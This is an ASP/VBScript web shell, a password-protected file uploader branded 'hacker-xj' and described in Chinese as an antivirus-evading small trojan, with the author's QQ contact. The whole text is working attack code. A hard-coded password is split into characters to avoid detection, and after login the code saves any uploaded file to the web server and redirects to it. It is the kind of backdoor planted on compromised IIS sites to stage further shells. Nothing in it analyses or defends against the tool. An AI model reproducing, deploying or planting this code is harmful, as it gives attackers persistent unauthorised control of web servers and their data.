test<%@ LANGUAGE = VBScript %>hacker-xj 超强小马 <% pass=Request("pass"):b="h"&"a"&"c"&"k"&"x"&"j":if pass=b then: session("pass")=b:end if:dim DblIslogin:if session("pass")<>b then: session("pass")="": DblIslogin=false : else: DblIslogin=true:end if:if DblIslogin=true then %>
by:xj~ 黑阔专版...免杀小马 QQ1352202666
文件:

<% dao=Request("dao"):dim upload,file,formName,formPath,T_comment:set upload=new upload_DAO:if dao="up" then:formPath="":fname="":openpara=upload.form("openpara"):set file=upload.file("DAOUploadFile") :if trim(file.FileName)<>"" then : if file.FileSize<=0 then : response.write "": response.End(): else: if right(formPath,1)<>"/" then: formPath=formPath&"/":end if: fname =file.FileName: file.SaveAs Server.mappath(fname): response.redirect fname & openpara : end if :end if :end if else:session("pass")="":response.write "It's not for you":response.End():end if:dim Data_DAO:Class upload_DAO :dim objForm,objFile,Version:Public function Form(strForm): strForm=lcase(strForm): if not objForm.exists(strForm) then: Form="": else: Form=objForm(strForm): end if:end function:Public function File(strFile): strFile=lcase(strFile): if not objFile.exists(strFile) then: set File=new FileInfo: else: set File=objFile(strFile): end if:end function:Private Sub Class_Initialize : dim RequestData,sStart,vbCrlf,sInfo,iInfoStart,iInfoEnd,tStream,iStart,theFile: dim iFileSize,sFilePath,sFileType,sFormValue,sFileName: dim iFindStart,iFindEnd: dim iFormStart,iFormEnd,sFormName: set objForm=Server.CreateObject("Scripting.Dictionary"): set objFile=Server.CreateObject("Scripting.Dictionary"): if Request.TotalBytes<1 then: Exit Sub:end if: set tStream = Server.CreateObject("adodb.stream"): set Data_DAO = Server.CreateObject("adodb.stream"): Data_DAO.Type = 1: Data_DAO.Mode =3: Data_DAO.Open: Data_DAO.Write Request.BinaryRead(Request.TotalBytes): Data_DAO.Position=0: RequestData =Data_DAO.Read : iFormStart = 1: iFormEnd = LenB(RequestData): vbCrlf = chrB(13) & chrB(10): sStart = MidB(RequestData,1, InStrB(iFormStart,RequestData,vbCrlf)-1): iStart = LenB (sStart): iFormStart=iFormStart+iStart+1: while (iFormStart + 10) < iFormEnd : iInfoEnd = InStrB(iFormStart,RequestData,vbCrlf & vbCrlf)+3: tStream.Type = 1: tStream.Mode =3: tStream.Open: Data_DAO.Position = iFormStart: Data_DAO.CopyTo tStream,iInfoEnd-iFormStart: tStream.Position = 0: tStream.Type = 2: tStream.Charset ="gb2312": sInfo = tStream.ReadText: tStream.Close: iFormStart = InStrB(iInfoEnd,RequestData,sStart): iFindStart = InStr(22,sInfo,"name=""",1)+6: iFindEnd = InStr(iFindStart,sInfo,"""",1): sFormName = lcase(Mid (sinfo,iFindStart,iFindEnd-iFindStart)): if InStr (45,sInfo,"filename=""",1) > 0 then: set theFile=new FileInfo: iFindStart = InStr(iFindEnd,sInfo,"filename=""",1)+10: iFindEnd = InStr(iFindStart,sInfo,"""",1): sFileName = Mid (sinfo,iFindStart,iFindEnd-iFindStart): theFile.FileName=getFileName(sFileName): theFile.FilePath=getFilePath(sFileName): iFindStart = InStr(iFindEnd,sInfo,"Content-Type: ",1)+14: iFindEnd = InStr(iFindStart,sInfo,vbCr): theFile.FileType =Mid (sinfo,iFindStart,iFindEnd-iFindStart): theFile.FileStart =iInfoEnd: theFile.FileSize = iFormStart -iInfoEnd -3: theFile.FormName=sFormName: if not objFile.Exists(sFormName) then: objFile.add sFormName,theFile: end if: else: tStream.Type =1: tStream.Mode =3: tStream.Open: Data_DAO.Position = iInfoEnd : Data_DAO.CopyTo tStream,iFormStart-iInfoEnd-3: tStream.Position = 0: tStream.Type = 2: tStream.Charset ="gb2312": sFormValue = tStream.ReadText : tStream.Close: if objForm.Exists(sFormName) then: objForm(sFormName)=objForm(sFormName)&", "&sFormValue : else: objForm.Add sFormName,sFormValue: end if: end if: iFormStart=iFormStart+iStart+1: wend: RequestData="": set tStream =nothing:End Sub:Private Sub Class_Terminate : if Request.TotalBytes>0 then: objForm.RemoveAll: objFile.RemoveAll: set objForm=nothing: set objFile=nothing: Data_DAO.Close: set Data_DAO =nothing: end if:End Sub:Private function GetFilePath(FullPath): If FullPath <> "" Then: GetFilePath = left(FullPath,InStrRev(FullPath, "\")): Else: GetFilePath = "": End If:End function:Private function GetFileName(FullPath): If FullPath <> "" Then: GetFileName = mid(FullPath,InStrRev(FullPath, "\")+1): Else: GetFileName = "": End If: End function:End Class:Class FileInfo: dim FormName,FileName,FilePath,FileSize,FileType,FileStart: Private Sub Class_Initialize : FileName = "": FilePath = "": FileSize = 0: FileStart= 0: FormName = "": FileType = "":End Sub :Public function SaveAs(FullPath): dim dr,ErrorChar,i: SaveAs=true: if trim(fullpath)="" or FileStart=0 or FileName="" or right(fullpath,1)="/" then: exit function:end if: set dr=CreateObject("Adodb.Stream"): dr.Mode=3: dr.Type=1: dr.Open: Data_DAO.position=FileStart: Data_DAO.copyto dr,FileSize: dr.SaveToFile FullPath,2: dr.Close: set dr=nothing : SaveAs=false:end function:End Class %>